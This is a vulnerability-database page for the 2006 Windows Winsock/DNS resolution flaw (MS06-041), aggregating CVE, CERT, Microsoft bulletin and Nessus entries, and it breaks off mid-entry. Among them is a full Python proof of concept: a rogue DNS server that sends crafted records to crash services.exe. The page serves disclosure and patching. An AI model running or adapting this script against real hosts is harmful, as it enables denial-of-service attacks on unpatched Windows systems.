Search...

Microsoft Windows Winsock API Hostname Remote Code Execution

2006-08-08T14:50:08

ID OSVDB:27843
Type osvdb
Reporter OSVDB
Modified 2006-08-08T14:50:08

Description

No description provided by the source

References:

Secunia Advisory ID:21394 Related OSVDB ID: 27844 News Article: http://www.techworld.com/security/news/index.cfm?newsID=6581 Microsoft Security Bulletin: MS06-041 Microsoft Knowledge Base Article: 920683 Keyword: aka "Winsock Hostname Vulnerability." CVE-2006-3440 CERT VU: 908276

JSON Vulners Source

Initial Source

{"edition": 1, "title": "Microsoft Windows Winsock API Hostname Remote Code Execution", "bulletinFamily": "software", "published": "2006-08-08T14:50:08", "lastseen": "2017-04-28T13:20:24", "modified": "2006-08-08T14:50:08", "reporter": "OSVDB", "viewCount": 3, "href": "https://vulners.com/osvdb/OSVDB:27843", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:21394](https://secuniaresearch.flexerasoftware.com/advisories/21394/)\n[Related OSVDB ID: 27844](https://vulners.com/osvdb/OSVDB:27844)\nNews Article: http://www.techworld.com/security/news/index.cfm?newsID=6581\nMicrosoft Security Bulletin: MS06-041\nMicrosoft Knowledge Base Article: 920683\nKeyword: aka \"Winsock Hostname Vulnerability.\" \n[CVE-2006-3440](https://vulners.com/cve/CVE-2006-3440)\nCERT VU: 908276\n", "affectedSoftware": [], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-04-28T13:20:24", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3440"]}, {"type": "cert", "idList": ["VU:908276"]}, {"type": "exploitdb", "idList": ["EDB-ID:2900"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13790"]}, {"type": "nessus", "idList": ["SMB_NT_MS06-041.NASL"]}], "modified": "2017-04-28T13:20:24", "rev": 2}, "vulnersScore": 7.5}, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "cvelist": ["CVE-2006-3440"], "id": "OSVDB:27843", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:27:22", "description": "Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka \"Winsock Hostname Vulnerability.\"", "edition": 4, "cvss3": {}, "published": "2006-08-09T01:04:00", "title": "CVE-2006-3440", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3440"], "modified": "2018-10-12T21:40:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_2003_server:64-bit", "cpe:/o:microsoft:windows_2003_server:sp1", "cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2006-3440", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3440", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_2003_server:sp1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:sp1:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:64-bit:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp4:*:fr:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*"]}], "cert": [{"lastseen": "2020-09-18T20:43:12", "bulletinFamily": "info", "cvelist": ["CVE-2006-3440"], "description": "### Overview \n\nA buffer overflow vulnerability in Microsoft Winsock may allow a remote attacker to execute arbitrary code on an affected system.\n\n### Description \n\nWinsock (Windows Socket 2) allows network applications to relay data across a network regardless of the network protocol being used. Microsoft's Winsock contains a buffer overflow vulnerability that can allow a remote attacker to execute arbitrary code and gain control of the affected system. Exploitation of this vulnerability occurs when the remote attacker can convince the user to open a specially crafted file or website.\n\nMicrosoft's bulletin states that the following Windows operating systems are affected by this vulnerability: \n\n\n * Microsoft Windows 2000 Service Pack 4\n * Microsoft Windows XP Service Pack 1 and Service Pack 2\n * Microsoft Windows XP Professional x64 Edition\n * Microsoft Windows Server 2003 and Service Pack 1\n * Microsoft Windows Server 2003 for Itanium-based Systems and Service Pack 1\n * Microsoft Windows Server 2003 x64 Edition \n--- \n \n### Impact \n\nA remote attacker who can successfully convince a user to open a specially crafted file or website may be able to execute arbitrary code and gain control of the affected system. \n \n--- \n \n### Solution \n\n**Apply an update** \nMicrosoft has released updates in Microsoft Security Bulletin[ MS06-041](<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>) to address this issue. \n \n \n--- \n \n**Workaround** \n \nMicrosoft lists the following workaround for this vulnerability. \n \n**Modify the Autodial DLL** \n \nModifying the Autodial DLL in the Windows registry will prevent specially crafted files and websites from invoking the affected API. \n \nPlease see the [Microsoft Security Bulletin MS06-041](<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>) for further details and cautions regarding use of the Registry Editor. \n\n\n 1. Click **Start**, click **Run**, and type **regedit32**, click **OK**\n 2. Locate the following key within the Registry Editor: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Winsock2\\Parameters\n 3. Double click the REG_SZ value **AutoDialDLL**\n 4. Set the value to **kernel32.dll**\n 5. Close the Registry Editor and reboot the system\n \n* Note that this workaround does NOT fix the underlying vulnerability but will help block known methods of attack. \n--- \n \n### Vendor Information\n\n908276\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: August 08, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft Corporation has published Microsoft Security Bulletin [MS06-041](<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>) in response to this issue. Users are encouraged to review this bulletin and apply the referenced patches.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23908276 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n<http://www.microsoft.com/technet/security/bulletin/ms06-041.mspx>\n\n### Acknowledgements\n\nThanks to Microsoft Security for reporting this vulnerability in Microsoft Security Bulletin MS06-041. Microsoft, in turn, thanks Peter Winter Smith of NGS Software for reporting the vulnerability to them. \n\nThis document was written by Katie Washok.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3440](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3440>) \n---|--- \n**Severity Metric:** | 12.83 \n**Date Public:** | 2006-08-08 \n**Date First Published:** | 2006-08-08 \n**Date Last Updated: ** | 2006-08-08 21:09 UTC \n**Document Revision: ** | 28 \n", "modified": "2006-08-08T21:09:00", "published": "2006-08-08T00:00:00", "id": "VU:908276", "href": "https://www.kb.cert.org/vuls/id/908276", "type": "cert", "title": "Microsoft Winsock buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T17:16:46", "description": "MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041). CVE-2006-3440,CVE-2006-3441. Dos exploit for windows platform", "published": "2006-12-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - DNS Resolution - Remote Denial of Service PoC MS06-041", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3440", "CVE-2006-3441"], "modified": "2006-12-09T00:00:00", "id": "EDB-ID:2900", "href": "https://www.exploit-db.com/exploits/2900/", "sourceData": "#!/usr/bin/python\r\n#POC for MS06-041\r\n#Run the python script passing the local ip address as parameter. The DNS server\r\n#will start listening on this ip address for DNS hostname resolution queries.\r\n#This script is for testing and educational purpose and so to test this one will\r\n#have to point the DNS resolver on the target/client to the ip address on which\r\n#this script runs.\r\n#Open up internet explorer and type in a hostname. services.exe will crash.\r\n#You may have to repeat this two or three times to see the crash in services.exe\r\n# Tested on Windows 2000 server SP0 and SP1 inside VmWare. Could not\r\n# reproduce on SP4 though it is also vulnerable. May be I missed something :)\r\n#\r\n# For testing/educational purpose. Author shall bear no responsibility for any screw ups\r\n# Winny Thomas ;-)\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\n\r\nclass DNSserver:\r\n def __init__(self, localhost):\r\n self.response = ''\r\n self.__create_socket(localhost)\r\n\r\n def __create_socket(self, localhost):\r\n self.host = localhost\r\n self.port = 53\r\n self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n self.DNSsocket.bind((self.host, self.port))\r\n print 'Awaiting DNS queries'\r\n print '====================\\n'\r\n while 1:\r\n self.__await_query()\r\n\r\n def __await_query(self):\r\n self.Query, self.Addr = self.DNSsocket.recvfrom(1024)\r\n print 'Query from: ' + str(self.Addr)\r\n self.TransactID = self.Query[0:2]\r\n self.__find_type(self.Query[2:])\r\n\r\n def __find_type(self, Question):\r\n qType = struct.unpack('>H', Question[0:2])\r\n if qType[0] == 256:\r\n self.__send_response(Question[10:-4])\r\n\r\n def __send_response(self, sName):\r\n self.response = self.TransactID\r\n self.response += '\\x85\\x80' #Flags\r\n self.response += '\\x00\\x01' #Questions\r\n self.response += '\\x00\\x02' #Answer RR's\r\n self.response += '\\x00\\x01' #Authority RR\r\n self.response += '\\x00\\x00' #Additional RR\r\n\r\n #QUERIES\r\n #self.response += sName\r\n self.response += '\\x04\\x74\\x65\\x73\\x74\\x07\\x68\\x61\\x63\\x6b\\x65'\r\n self.response += '\\x72\\x73\\x03\\x63\\x6f\\x6d\\x00'\r\n self.response += '\\x00\\xff' #request all records\r\n self.response += '\\x00\\x01' #inet class\r\n\r\n #ANSWERS\r\n #A record\r\n self.response += '\\xc0\\x0c\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x07'\r\n self.response += '\\x00\\x04\\xc0\\xa8\\x00\\x02' #A type record (IP add)\r\n #TXT record\r\n self.response += '\\xc0\\x0c\\x00\\x10\\x00\\x01\\x00\\x00\\x00\\x07'\r\n self.response += '\\x00\\x18' #TXT record length\r\n self.response += '\\x08\\x50\\x52\\x4f\\x54\\x4f\\x43\\x4f\\x4c'\r\n self.response += '\\x00' #Zero length TXT RDATA\r\n self.response += '\\x00' #Zero length TXT RDATA\r\n self.response += '\\x08\\x50\\x52\\x4f\\x54\\x4f\\x43\\x4f\\x4c'\r\n self.response += '\\x00' #Zero length TXT RDATA\r\n self.response += '\\x00' #Zero length TXT RDATA\r\n self.response += '\\x01\\x41'\r\n\r\n #Authoritative Nameservers\r\n self.response += '\\xc0\\x11\\x00\\x02\\x00\\x01\\x00\\x01\\x51\\x80'\r\n self.response += '\\x00\\x0b\\x08\\x73\\x63\\x6f\\x72\\x70\\x69\\x6f'\r\n self.response += '\\x6e\\xc0\\x11'\r\n\r\n self.DNSsocket.sendto(self.response, (self.Addr))\r\n\r\nif __name__ == '__main__':\r\n try:\r\n localhost = sys.argv[1]\r\n except IndexError:\r\n print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]\r\n sys.exit(-1)\r\n\r\n D = DNSserver(localhost)\r\n\r\n# milw0rm.com [2006-12-09]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2900/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3440", "CVE-2006-3441"], "description": "Microsoft Security Bulletin MS06-041\r\nVulnerability in DNS Resolution Could Allow Remote Code Execution (920683)\r\nPublished: August 8, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves several newly discovered, privately reported, vulnerabilities.\r\n\r\nAn attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWe recommend that customers apply this update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 2000\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nWinsock Hostname Vulnerability - CVE-2006-3440\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nDNS Client Buffer Overrun Vulnerability - CVE-2006-3441\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The security updates for Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Windows XP Professional x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhy does this update address several reported security vulnerabilities?\r\nThis update addresses several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers can install only this update.\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nFor more information, visit the Windows Operating System FAQ.\r\nProduct\tMBSA 1.2.1\tMBSA 2.0\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nWinsock Hostname Vulnerability - CVE-2006-3440:\r\n\r\nThere is a remote code execution vulnerability in Winsock that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system. For an attack to be successful the attacker would have to force the user to open a file or visit a website that is specially crafted to call the affected Winsock API.\r\n\t\r\nMitigating Factors for Winsock Hostname Vulnerability - CVE-2006-3440:\r\n\u2022\t\r\n\r\nThe vulnerability could be exploited by an attacker who persuaded a user to open a specially crafted file or view a specially crafted website. There is no way for an attacker to force a user to open a specially crafted file, except potentially through previewing an e-mail message.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Winsock Hostname Vulnerability - CVE-2006-3440:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nModify the Autodial DLL\r\n\r\nModifying the Autodial DLL within the Windows registry will prevent an application, specially crafted website or e-mail message from calling the affected API and exploiting the vulnerability. If the Autodial DLL registry value is not found by default in the specified location we recommend that customers create the REG_SZ value accordingly.\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\nNote We recommend backing up the registry before you edit\r\n\u2022\t\r\n\r\nClick Start, click Run, type "regedt32 " (without the quotation marks), and then click OK\r\n\u2022\t\r\n\r\nIn Registry Editor, locate the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\r\n\u2022\t\r\n\r\nDouble click the REG_SZ value AutodialDLL\r\n\u2022\t\r\n\r\nSet the data value to kernel32.dll\r\n\u2022\t\r\n\r\nClose the regedt32 utility and reboot\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Winsock Hostname Vulnerability - CVE-2006-3440:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the Winsock API.\r\n\r\nWhat is Winsock?\r\nWindows Sockets 2 (Winsock) enables programmers to create advanced Internet, intranet, and other network-capable applications to transmit application data across the wire, independent of the network protocol being used. With Winsock, programmers are provided access to advanced Microsoft\u00ae Windows\u00ae networking capabilities such as multicast and Quality of Service (QOS). For more information about Winsock, please see the following MSDN Article.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nThe vulnerability could be exploited by an attacker who persuaded a user to open a specially crafted file or view a specially crafted website. There is no way for an attacker to force a user to open a specially crafted file, except potentially through previewing an e-mail message. Additionally, if an application uses the affected API it is possible that it could be exploited during regular usage scenarios that may not require user action.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nServers and workstations are primarily at risk from this vulnerability.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected function validates the message before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nDNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\r\nThere is a remote code execution vulnerability in the DNS Client service that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.\r\n\t\r\nMitigating Factors DNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\u2022\t\r\n\r\nFor an attack to be successful the attacker would either have to be on a subnet between the host and the DNS server or force the target host to make a DNS request to receive a specially crafted record response from an attacking server.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for DNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nFor an attack to be successful the attackers would either have to be on a subnet between the host and the DNS server or force the target host to make a DNS request to receive a specially crafted record response from an attacking server.\r\n\u2022\t\r\n\r\nBlock DNS related records at network gateways\r\n\r\nBlocking the following DNS record types at network gateways will help protect the affected system from attempts to exploit this vulnerability.\r\n\u2022\t\r\n\r\nATMA\r\n\u2022\t\r\n\r\nTXT\r\n\u2022\t\r\n\r\nX25\r\n\u2022\t\r\n\r\nHINFO\r\n\u2022\t\r\n\r\nISDN DNS\r\nTop of sectionTop of section\r\n\t\r\nFAQ DNS Client Buffer Overrun Vulnerability - CVE-2006-3441:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the DNS client layer.\r\n\r\nWhat is DNS?\r\nThe Domain Name System (DNS) client service resolves and caches DNS names. The DNS client service must be running on every computer that will perform DNS name resolution. The ability to resolve DNS names is crucial for locating domain controllers in Active Directory domains. The DNS client service is also critical for locating devices identified using DNS name resolution. For more information on the DNS client service please see the following Microsoft TechNet Article.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn anonymous user could exploit the vulnerability by sending a specially crafted DNS communication to an affected client. For an attack to be successful the attacker would either have to be on a subnet between the host and the DNS server or force the target host to make a DNS request to receive a specially crafted record response from an attacking server.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nServers and workstations are primarily at risk from this vulnerability.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by validating the way that the DNS client handles DNS related communications.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nAn attacker could try to exploit this vulnerability over the Internet. Firewall best practices and standard default firewall configurations can help protect against attacks that originate from the Internet. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by validating the way that the DNS client handles DNS related communications.\r\n\r\nWould disabling the DNS client service or configuring the client to use a specific DNS server mitigate the vulnerability?\r\nNo. The vulnerability cannot be mitigated by disabling the DNS client service or configuring the use of a specific trusted DNS server.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nPeter Winter Smith of NGS Software for reporting the Winsock Hostname Vulnerability - (CVE-2006-3440).\r\n\u2022\t\r\n\r\nMark Dowd of ISS X-Force for reporting the DNS Client Buffer Overrun Vulnerability - (CVE-2006-3441).\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (August 8, 2006): Bulletin published.", "edition": 1, "modified": "2006-08-08T00:00:00", "published": "2006-08-08T00:00:00", "id": "SECURITYVULNS:DOC:13790", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13790", "title": "Microsoft Security Bulletin MS06-041 Vulnerability in DNS Resolution Could Allow Remote Code Execution (920683)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T06:15:35", "description": "The remote host is vulnerable to a buffer overrun in the DNS client\nservice that could allow an attacker to execute arbitrary code on the\nremote host with SYSTEM privileges.\n\nTo exploit this vulnerability, an attacker would need to set up a\nrogue DNS server to reply to the client with a specially crafted\npacket.", "edition": 29, "published": "2006-08-08T00:00:00", "title": "MS06-041: Vulnerability in DNS Resolution Could Allow Remote Code Execution (920683)", "type": 